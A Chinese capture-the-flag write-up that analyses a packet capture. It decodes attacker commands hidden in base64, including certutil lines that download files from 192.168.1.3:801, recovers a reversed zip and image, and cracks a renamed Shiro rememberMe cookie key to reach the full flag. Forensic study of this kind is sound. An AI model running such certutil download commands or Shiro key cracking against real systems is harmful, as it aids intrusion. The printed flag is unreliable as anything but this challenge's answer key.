题目描述:
下载附件,解压之后得到miaoro.pcapng,用NetA分析一下:
没找到关键词flag,用wireshark打开,http contains "flag"也是一片空白,应该是被加密了,只能手动查找相关信息了
追踪tcp流,发现了“GWHT”字段,而且在流10中发现了base64编码:
解密结果:
echo Th15_11111111s_pP@sssssw000rd!!!>pass.txt
Th15_11111111s_pP@sssssw000rd!!!看上去像是个密码
之后不断从流11、12、13、...的顺序下去进行base64解码:
流11:
Y2VydHV0aWwgLXVybGNhY2hlIC1mICJodHRwOi8vMTkyLjE2OC4xLjM6ODAxL3Rlc3QudHh0Ig==
certutil -urlcache -f "http://192.168.1.3:801/test.txt"
流12:
aXBjb25maWc=
ipconfig
流13:
Y2VydHV0aWwgLXVybGNhY2hlIC1mICJodHRwOi8vMTkyLjE2OC4xLjM6ODAxL3NlY3JldC50eHQi
certutil -urlcache -f "http://192.168.1.3:801/secret.txt"
此时,出现了“secret.txt”字段,且是通过http链接进行下载的,再追踪流13的http流的回应报文:
(注意:直接追踪tcp流的这部分的base64编码数据会有缺陷,所以得追踪http流,很多WP都是放了tcp流的截图上去,然后就继续做下去了,实际上是没法复现成功的)
追踪http流的时候可能会未响应或者闪退,重新追踪即可:
再去base64解码:
发现右侧数据是经典的十六进制数据而且是出现关键字段“4030b405”,压缩包zip的是“504b0304”,刚好反过来了,保存为1.txt文件
解码看到“PK”字段的头还有“flag2.jpg”字段,保存为.zip文件:
(“PK”是zip的头)
填写先前得到的解压密码,解压得到flag2.jpg:
接下来就是修改图片宽高:
Alt+4查看模版结果,改成同宽高即可:
得到小猫图片:
百度识图查找相关信息:
对比该小猫字母图得到flag2:
EBOFDELQDIAA}
在追踪到tcp流6的时候发现cookie值有个“nekoMiao=”的参数:
经了解,出题人对Shiro名以及框架里常见的变量名进行了修改
(shiro->miaoro、rememberMe->nekoMiao、deleteMe->nikoMiao)
也就是说,nekoMiao实际上就是变量rememberMe
那接下来就是爆破Shiro了,可以用蓝队工具箱的“Shiro模块”进行爆破:
但流6的cookie值没法爆破出来,换成流7的cookie值倒是成功爆破出来:
得到flag1:
DASCTF{B916CFEB-C40F-45D6-A7BC-
当然也可以用Shiro rememberMe在线解密得出flag1:
(https://potato.gold/navbar/tool/shiro/ShiroTool.html)
拼接flag:
DASCTF{B916CFEB-C40F-45D6-A7BC-EBOFDELQDIAA}